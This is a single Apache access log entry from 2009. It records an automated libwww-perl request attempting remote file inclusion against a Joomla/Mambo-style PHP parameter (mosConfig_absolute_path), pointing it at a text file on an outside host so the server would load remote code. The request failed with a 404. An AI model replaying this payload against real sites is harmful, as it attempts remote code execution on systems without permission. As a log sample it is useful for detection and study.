70.86.9.234 - - [18/Jul/2009:04:19:16 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
